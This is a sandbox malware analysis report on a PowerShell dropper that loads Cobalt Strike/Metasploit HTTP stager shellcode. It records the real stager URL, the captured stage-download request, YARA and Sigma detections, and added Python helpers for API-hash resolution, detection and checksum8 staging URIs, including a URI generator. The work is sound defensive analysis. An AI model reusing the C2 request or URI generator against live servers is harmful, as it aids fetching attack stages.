
Windows Analysis Report
fabd6ab15a0540d197f1ceaa312308b8.ps1

Overview

General Information

Sample name: fabd6ab15a0540d197f1ceaa312308b8.ps1
Analysis ID: 1602897
MD5: 8e117177bf5213213a857e0772e0d879
SHA1: 34cd43115fd3afc87867b7fafed5d22efd7209fd
SHA256: c22079f6740eb864daa646b8d6f6a6d038482db3830ec0dd47fa3b0893c9eb0c
Tags: 156-253-250-62, ps1, user-JAMESWT_MHT

Detection

Detection: CobaltStrike, Metasploit
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected CobaltStrike
Yara detected Metasploit Payload
C2 URLs / IPs found in malware configuration
Found API chain indicative of debugger detection
Found suspicious powershell code related to unpacking or dynamic code loading
Joe Sandbox ML detected suspicious sample
Machine Learning detection for dropped file
Powershell drops PE file
AV process strings found (often used to terminate AV products)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Classification chart (only its labels survive extraction). Behaviour categories: Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner. Verdict scale: clean, suspicious, malicious.
  • System is w10x64
  • powershell.exe (PID: 4312 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\fabd6ab15a0540d197f1ceaa312308b8.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 4624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • tmpE651.exe (PID: 3848 cmdline: "C:\Users\user\AppData\Local\Temp\tmpE651.exe" MD5: A7E64FEA00D97B963D90E53093D5E220)
      • WerFault.exe (PID: 6984 cmdline: C:\Windows\system32\WerFault.exe -u -p 3848 -s 1116 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • cleanup
Name: Cobalt Strike, CobaltStrike
Description: Cobalt Strike is a paid penetration testing product that allows an attacker to deploy an agent named 'Beacon' on the victim machine. Beacon offers the attacker a wealth of functionality, including, but not limited to, command execution, key logging, file transfer, SOCKS proxying, privilege escalation, mimikatz, port scanning and lateral movement. Beacon is in-memory/file-less, in that it consists of stageless or multi-stage shellcode that, once loaded by exploiting a vulnerability or executing a shellcode loader, will reflectively load itself into the memory of a process without touching the disk. It supports C2 and staging over HTTP, HTTPS, DNS and SMB named pipes as well as forward and reverse TCP; Beacons can be daisy-chained. Cobalt Strike comes with a toolkit for developing shellcode loaders, called Artifact Kit. The Beacon implant has become popular amongst targeted attackers and criminal users as it is well written, stable, and highly customizable.
Attribution:
  • APT 29
  • APT32
  • APT41
  • AQUATIC PANDA
  • Anunak
  • Cobalt
  • Codoso
  • CopyKittens
  • DarkHydrus
  • Earth Baxia
  • FIN6
  • FIN7
  • Leviathan
  • Mustang Panda
  • Shell Crew
  • Stone Panda
  • TianWu
  • UNC1878
  • UNC2452
  • Winnti Umbrella
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike
Extracted configuration, Cobalt Strike extractor:
{
  "C2Server": "http://.17.10.250:80/EkTY",
  "User Agent": "User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\r\n"
}

Extracted configuration, Metasploit extractor:
{
  "Headers": "User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\r\n",
  "Type": "Metasploit Download",
  "URL": "http://3.17.10.250/EkTY"
}

The Cobalt Strike extractor's C2Server value is missing its first octet; the Metasploit extractor and the captured HTTP traffic in the Networking section both give 3.17.10.250 on port 80, so http://3.17.10.250/EkTY is the stager URL to use as an indicator. Both extractors parsed the same stager shellcode, which is why one sample yields a Cobalt Strike and a Metasploit configuration: Cobalt Strike's HTTP stager shares its block_api/stager code lineage with Metasploit.
YARA matches on dropped files:

Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER16A.tmp.dmp
Rule: Windows_Trojan_Metasploit_7bc0f998
Description: Identifies the API address lookup function leverage by metasploit shellcode
Author: unknown
Strings:
  • 0x5dd7:$a1: 48 31 D2 65 48 8B 52 60 48 8B 52 18 48 8B 52 20 48 8B 72 50 48 0F B7 4A 4A 4D 31 C9 48 31 C0 AC 3C 61

Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER16A.tmp.dmp
Rule: Windows_Trojan_Metasploit_c9773203
Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families.
Author: unknown
Strings:
  • 0x5e43:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1
YARA matches in process memory:

Source: 00000002.00000002.1877409449.00000000001D0000.00000020.00001000.00020000.00000000.sdmp
Rule: JoeSecurity_MetasploitPayload_3
Description: Yara detected Metasploit Payload
Author: Joe Security

Source: 00000002.00000002.1877409449.00000000001D0000.00000020.00001000.00020000.00000000.sdmp
Rule: JoeSecurity_CobaltStrike_3
Description: Yara detected CobaltStrike
Author: Joe Security

Source: 00000002.00000002.1877409449.00000000001D0000.00000020.00001000.00020000.00000000.sdmp
Rule: Windows_Trojan_Metasploit_7bc0f998
Description: Identifies the API address lookup function leverage by metasploit shellcode
Author: unknown
Strings:
  • 0x11:$a1: 48 31 D2 65 48 8B 52 60 48 8B 52 18 48 8B 52 20 48 8B 72 50 48 0F B7 4A 4A 4D 31 C9 48 31 C0 AC 3C 61

Source: 00000002.00000002.1877409449.00000000001D0000.00000020.00001000.00020000.00000000.sdmp
Rule: Windows_Trojan_Metasploit_c9773203
Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families.
Author: unknown
Strings:
  • 0x7d:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1

Source: Process Memory Space: powershell.exe PID: 4312
Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC
Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Author: ditekSHen
Strings:
  • $b1: ::WriteAllBytes( at 0x20b78, 0x25a0f8
  • $b2: ::FromBase64String( at 0x1a579
  • $s1: -join at 0xebf7, 0x162cc, 0x46a68, 0x46aa3, 0x46b5d, 0x46b8b, 0x46d17, 0x46d3a, 0x46fed, 0x4700e, 0x47040, 0x47088, 0x470b5, 0x470dc, 0x47107, 0x47123, 0x4718c, 0x47613

The two Elastic rule strings are the x64 Metasploit block_api stub: $a1 is the PEB walk (xor rdx,rdx; mov rdx,gs:[rdx+0x60]; mov rdx,[rdx+0x18]; mov rdx,[rdx+0x20]; mov rsi,[rdx+0x50]; movzx rcx,word [rdx+0x4a]; xor r9,r9; xor rax,rax; lodsb; cmp al,'a'), i.e. PEB -> Ldr -> InMemoryOrderModuleList -> BaseDllName, and $a: is the export-name hashing loop (xor rax,rax; lodsb; ror r9d,13; add r9d,eax; cmp al,ah; jne; add r9,[rsp+8]; cmp r9d,r10d). The match sits at offset 0x11 of the 0x1D0000 region of tmpE651.exe (process 2), so that region holds the raw stager shellcode, and the same bytes recur at 0x5dd7/0x5e43 of the WerFault crash dump of that process.
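As an added example for this report (not code from the sample, from Joe Sandbox or from the rule authors), the following re-implements the ror13 API hash that the matched block_api stub computes, so that the 32-bit constants a stager loads before calling it can be resolved back to module!export names. It follows Metasploit's block_api.asm: the module name is read from the loader list as UTF-16LE including its terminating null (the stub uses BaseDllName.MaximumLength), lower-case ASCII is folded to upper-case, each byte does h = ror32(h, 13) + byte, the export name is hashed the same way as ASCII including its null byte, and the two sums are added modulo 2^32. The instruction patterns scanned for are the ones Metasploit's x64 (mov r10d, imm32) and x86 (push imm32) stagers emit; the stub bytes fed to the scanner are constructed here.

```python
"""ror13 API hashing as implemented by Metasploit's block_api shellcode,
plus a scanner that resolves hash constants embedded in a stager."""
import struct


def ror32(value, bits):
    """Rotate a 32-bit value right (the `ror r9d, 13` in the YARA string)."""
    value &= 0xFFFFFFFF
    return ((value >> bits) | (value << (32 - bits))) & 0xFFFFFFFF


def _hash_bytes(data, bits=13):
    h = 0
    for b in data:
        h = (ror32(h, bits) + b) & 0xFFFFFFFF   # `add r9d, eax` with 32-bit wraparound
    return h


def module_hash(module):
    """Hash of the module name as the stub sees it: upper-case UTF-16LE, null included."""
    return _hash_bytes((module.upper() + "\x00").encode("utf-16-le"))


def function_hash(function):
    """Hash of the export name from the module's export name table (ASCII, null included)."""
    return _hash_bytes((function + "\x00").encode("ascii"))


def api_hash(module, function):
    """The 32-bit constant a stager loads into r10d (x64) or pushes (x86) before calling block_api."""
    return (module_hash(module) + function_hash(function)) & 0xFFFFFFFF


# Imports a Windows HTTP/TCP stager typically resolves; extend as needed.
KNOWN = {
    api_hash(m, f): f"{m}!{f}"
    for m, f in [
        ("kernel32.dll", "LoadLibraryA"), ("kernel32.dll", "VirtualAlloc"),
        ("kernel32.dll", "ExitProcess"), ("kernel32.dll", "WinExec"),
        ("wininet.dll", "InternetOpenA"), ("wininet.dll", "InternetConnectA"),
        ("wininet.dll", "HttpOpenRequestA"), ("wininet.dll", "HttpSendRequestA"),
        ("wininet.dll", "InternetReadFile"),
        ("ws2_32.dll", "WSAStartup"), ("ws2_32.dll", "WSASocketA"),
        ("ws2_32.dll", "connect"), ("ws2_32.dll", "recv"),
    ]
}


def resolve(h):
    return KNOWN.get(h & 0xFFFFFFFF, "unknown")


def find_hash_constants(code):
    """Scan for the two ways stagers load an API hash before `call rbp` / `call ebp`:
    x64: mov r10d, imm32 (41 BA xx xx xx xx); x86: push imm32 (68 xx xx xx xx).
    Returns (offset, hash, name) for every hit that resolves to a known API."""
    hits = []
    for off in range(len(code)):
        if code[off:off + 2] == b"\x41\xBA" and off + 6 <= len(code):
            h = struct.unpack_from("<I", code, off + 2)[0]
        elif code[off] == 0x68 and off + 5 <= len(code):
            h = struct.unpack_from("<I", code, off + 1)[0]
        else:
            continue
        if h in KNOWN:
            hits.append((off, h, KNOWN[h]))
    return hits


# Constructed snippet (not bytes from the sample): "mov r10d, 0x0726774C; call rbp"
# followed by "push 0x56A2B5F0; call ebp", the x64 and x86 spellings of the idiom.
SAMPLE_STUB = bytes.fromhex("41BA4C772607FFD5") + bytes.fromhex("68F0B5A256FFD5")

if __name__ == "__main__":
    print(hex(api_hash("kernel32.dll", "LoadLibraryA")))
    for off, h, name in find_hash_constants(SAMPLE_STUB):
        print(f"+0x{off:02x}: 0x{h:08X} -> {name}")
```

Run against the 0x1D0000 region dumped from tmpE651.exe (or the WER16A.tmp.dmp crash dump), the scanner lists which imports the stager resolves, which is usually enough to tell an HTTP stager (wininet) from a TCP one (ws2_32) without a debugger.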

System Summary

Sigma match (rule author: frack113), event: Process started
  Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\fabd6ab15a0540d197f1ceaa312308b8.ps1"
  CommandLine: (same as Command)
  CommandLine|base64offset|contains: z
  Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  ParentCommandLine: (empty)
  ParentImage: (empty)
  ParentProcessId: 2580
  ProcessCommandLine: (same as Command)
  ProcessId: 4312
  ProcessName: powershell.exe
Sigma match (rule author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)), event: Process started, on the same event data as above.
No Suricata rule has matched
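The Sigma hits above fire on a single process-creation event. As an added example (not Joe Sandbox or Sigma code), the following runs three process-creation detections over the chain in this report: powershell.exe started with an insecure execution policy, powershell.exe launching a PE from the user's Temp directory, and that PE crashing into WerFault.exe. The first rule is my own approximation of what a "Change PowerShell Policies to an Insecure Level" rule checks, not the Sigma rule's exact logic; field names follow Sysmon Event ID 1, and the events are built from the process tree at the top of this report.

```python
"""Process-creation detections for the powershell -> Temp PE -> WerFault chain."""
import re

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
TMP = r"C:\Users\user\AppData\Local\Temp\tmpE651.exe"

# Events reconstructed from this report's process tree (Sysmon Event ID 1 field names).
EVENTS = [
    {"ProcessId": 4312, "ParentProcessId": 2580, "Image": PS, "ParentImage": "",
     "CommandLine": '"' + PS + '" -noLogo -ExecutionPolicy unrestricted -file '
                    r'"C:\Users\user\Desktop\fabd6ab15a0540d197f1ceaa312308b8.ps1"'},
    {"ProcessId": 4624, "ParentProcessId": 4312, "Image": r"C:\Windows\System32\conhost.exe",
     "ParentImage": PS, "CommandLine": r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"},
    {"ProcessId": 3848, "ParentProcessId": 4312, "Image": TMP, "ParentImage": PS,
     "CommandLine": '"' + TMP + '"'},
    {"ProcessId": 6984, "ParentProcessId": 3848, "Image": r"C:\Windows\System32\WerFault.exe",
     "ParentImage": TMP, "CommandLine": r"C:\Windows\system32\WerFault.exe -u -p 3848 -s 1116"},
]

# -ExecutionPolicy and its accepted abbreviations, followed by a value that disables script checks.
EXEC_POLICY_RE = re.compile(r"-(?:ep|ex|exec|executionpolicy)\s+(?:bypass|unrestricted)\b", re.I)
# An executable living directly under %LOCALAPPDATA%\Temp.
TEMP_EXE_RE = re.compile(r"\\AppData\\Local\\Temp\\[^\\]+\.exe$", re.I)
# WerFault's -p <pid> argument names the crashed process.
WERFAULT_PID_RE = re.compile(r"WerFault\.exe\b.*?\s-p\s+(\d+)", re.I)


def detect(events):
    """Run the three rules over a stream of process-creation events, in order.
    The third rule is stateful: it only fires for a PID the second rule flagged earlier."""
    alerts, temp_children = [], set()
    for ev in events:
        image, cmd = ev["Image"].lower(), ev["CommandLine"]
        if image.endswith("powershell.exe") and EXEC_POLICY_RE.search(cmd):
            alerts.append(("insecure_execution_policy", ev["ProcessId"]))
        if ev["ParentImage"].lower().endswith("powershell.exe") and TEMP_EXE_RE.search(ev["Image"]):
            alerts.append(("powershell_runs_temp_pe", ev["ProcessId"]))
            temp_children.add(ev["ProcessId"])
        if image.endswith("werfault.exe"):
            m = WERFAULT_PID_RE.search(cmd)
            if m and int(m.group(1)) in temp_children:
                alerts.append(("temp_pe_crashed", int(m.group(1))))
    return alerts


if __name__ == "__main__":
    for rule, pid in detect(EVENTS):
        print(f"{rule}: pid {pid}")
```

The crash correlation is worth keeping: a stager that dies under WerFault is exactly the case here, and the resulting dump under C:\ProgramData\Microsoft\Windows\WER\Temp is where the shellcode YARA rules matched.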


AV Detection

Source: http://3.17.10.250/EkTY | Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Temp\tmpE651.exe | Avira: detection malicious, Label: HEUR/AGEN.1345031
Source: 00000002.00000002.1877409449.00000000001D0000.00000020.00001000.00020000.00000000.sdmp | Malware Configuration Extractor: CobaltStrike {"C2Server": "http://.17.10.250:80/EkTY", "User Agent": "User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\r\n"}
Source: 00000002.00000002.1877409449.00000000001D0000.00000020.00001000.00020000.00000000.sdmp | Malware Configuration Extractor: Metasploit {"Headers": "User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\r\n", "Type": "Metasploit Download", "URL": "http://3.17.10.250/EkTY"}
Source: C:\Users\user\AppData\Local\Temp\tmpE651.exe | ReversingLabs: Detection: 86%
Source: fabd6ab15a0540d197f1ceaa312308b8.ps1 | ReversingLabs: Detection: 21%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.8% probability
Source: C:\Users\user\AppData\Local\Temp\tmpE651.exe | Joe Sandbox ML: detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows

Networking

Source: Malware configuration extractor | URLs: http://.17.10.250:80/EkTY
Source: Malware configuration extractor | URLs: http://3.17.10.250/EkTY
Source: Joe Sandbox View | ASN Name: AMAZON-02 (US)
Source: global traffic | HTTP traffic detected (the same request was observed twice):
  GET /EkTY HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
  Host: 3.17.10.250
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: tmpE651.exe, 00000002.00000002.1877232038.00000000000AB000.00000004.00000020.00020000.00000000.sdmp, 00000002.00000002.1877232038.00000000000D6000.00000004.00000020.00020000.00000000.sdmp, 00000002.00000002.1877232038.00000000000CA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://3.17.10.250/EkTY
Source: tmpE651.exe, 00000002.00000002.1877232038.00000000000AB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://3.17.10.250/EkTYs
Source: powershell.exe, 00000000.00000002.1702047883.0000026422F7A000.00000004.00000800.00020000.00000000.sdmp, 00000000.00000002.1717782849.000002643146D000.00000004.00000800.00020000.00000000.sdmp, 00000000.00000002.1717782849.00000264315A4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000000.00000002.1702047883.0000026422E32000.00000004.00000800.00020000.00000000.sdmp, 00000000.00000002.1725475467.0000026439500000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.1702047883.00000264213F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Amcache.hve.5.dr | String found in binary or memory: http://upx.sf.net
Source: powershell.exe, 00000000.00000002.1702047883.00000264229D1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000000.00000002.1702047883.0000026422E32000.00000004.00000800.00020000.00000000.sdmp, 00000000.00000002.1725475467.0000026439500000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.1702047883.00000264213F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000000.00000002.1717782849.00000264315A4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.1717782849.00000264315A4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.1717782849.00000264315A4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000000.00000002.1702047883.0000026422E32000.00000004.00000800.00020000.00000000.sdmp, 00000000.00000002.1725475467.0000026439500000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.1702047883.0000026422F7A000.00000004.00000800.00020000.00000000.sdmp, 00000000.00000002.1717782849.000002643146D000.00000004.00000800.00020000.00000000.sdmp, 00000000.00000002.1717782849.00000264315A4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000000.00000002.1702047883.00000264229D1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://oneget.org
Source: powershell.exe, 00000000.00000002.1702047883.00000264229D1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://oneget.orgX

Only the 3.17.10.250 entries are indicators for this sample (the trailing "s" in EkTYs is memory garbage after the string). The four-character path /EkTY is a checksum8 staging URI of the kind Metasploit and Cobalt Strike HTTP stagers request (sum of the path's bytes modulo 256): its checksum is 93, which a Cobalt Strike team server answers with the x64 stage, consistent with the x64 shellcode found in tmpE651.exe. The User-Agent is the Internet Explorer 11 on Windows 7 string that these stagers have long used as their default. The nuget.org, pesterbdd.com, contoso.com, oneget.org, aka.ms, apache.org and schemas.xmlsoap.org strings come from PowerShell's bundled modules (PackageManagement/OneGet, PowerShellGet and Pester manifests) sitting in powershell.exe's memory, and http://upx.sf.net from the Amcache hive; treat them as noise.
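To make the staging-URI observation checkable, here is an added example (not code from the sample, Joe Sandbox, Metasploit or Cobalt Strike) that parses the captured GET, computes its checksum8 and says what a staging server would make of it. It relies on two facts: Metasploit's Windows reverse_http(s) stagers request a random URI whose checksum8 is 92, and Cobalt Strike's staging server hands out its x86 stage for checksum 92 and its x64 stage for checksum 93. The request text is the one from the capture above, reassembled with CRLF line endings.

```python
"""checksum8 classification of an HTTP stager request."""
import random

# The request from this report's traffic capture, re-joined with CRLF.
CAPTURED_REQUEST = ("GET /EkTY HTTP/1.1\r\n"
                    "User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\r\n"
                    "Host: 3.17.10.250\r\n"
                    "Connection: Keep-Alive\r\n"
                    "Cache-Control: no-cache\r\n\r\n")

STAGE_BY_CHECKSUM = {
    92: "x86 stage (Metasploit Windows stager / Cobalt Strike x86)",
    93: "x64 stage (Cobalt Strike x64)",
}
IE11_WIN7_UA = "Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko"


def checksum8(path):
    """Sum of the path's ASCII bytes modulo 256, leading slash excluded."""
    return sum(path.lstrip("/").encode("ascii")) % 256


def parse_request(raw):
    """Minimal HTTP/1.x request-line and header parser (no body handling)."""
    head = raw.split("\r\n\r\n", 1)[0].split("\r\n")
    method, path, version = head[0].split(" ", 2)
    headers = {}
    for line in head[1:]:
        name, _, value = line.partition(": ")
        headers[name.lower()] = value
    return {"method": method, "path": path, "version": version, "headers": headers}


def classify_stager_request(raw):
    req = parse_request(raw)
    cs = checksum8(req["path"])
    return {
        "path": req["path"],
        "host": req["headers"].get("host"),
        "checksum8": cs,
        "stage": STAGE_BY_CHECKSUM.get(cs, "none: checksum matches neither 92 nor 93"),
        "stager_user_agent": req["headers"].get("user-agent") == IE11_WIN7_UA,
    }


def make_stager_uri(target, length=4, seed=0):
    """Random alphanumeric path with the requested checksum8, the way a stager
    (or a scanner probing a suspected staging server) builds one."""
    rng = random.Random(seed)
    alphabet = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
    while True:
        body = "".join(rng.choice(alphabet) for _ in range(length))
        if checksum8(body) == target:
            return "/" + body


if __name__ == "__main__":
    print(classify_stager_request(CAPTURED_REQUEST))
    print(make_stager_uri(93))
```

A proxy log search for four-character paths whose checksum8 is 92 or 93, combined with this User-Agent, is a cheap retro-hunt for other hosts that pulled a stage from the same server.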

System Summary

Source: 00000002.00000002.1877409449.00000000001D0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
Source: 00000002.00000002.1877409449.00000000001D0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
Source: Process Memory Space: powershell.exe PID: 4312, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER16A.tmp.dmp, type: DROPPED | Matched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER16A.tmp.dmp, type: DROPPED | Matched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\tmpE651.exe (dropped file)
Source: C:\Users\user\AppData\Local\Temp\tmpE651.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 3848 -s 1116
Source: 00000002.00000002.1877409449.00000000001D0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
Source: 00000002.00000002.1877409449.00000000001D0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 4312, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER16A.tmp.dmp, type: DROPPED | Matched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER16A.tmp.dmp, type: DROPPED | Matched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
Source: classification engine | Classification label: mal100.troj.evad.winPS1@5/11@0/1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4624:120:WilError_03
Source: C:\Windows\System32\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3848
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q0futhai.pka.ps1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Users\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: fabd6ab15a0540d197f1ceaa312308b8.ps1 | ReversingLabs: Detection: 21%
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\fabd6ab15a0540d197f1ceaa312308b8.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Local\Temp\tmpE651.exe "C:\Users\user\AppData\Local\Temp\tmpE651.exe"
Source: C:\Users\user\AppData\Local\Temp\tmpE651.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 3848 -s 1116

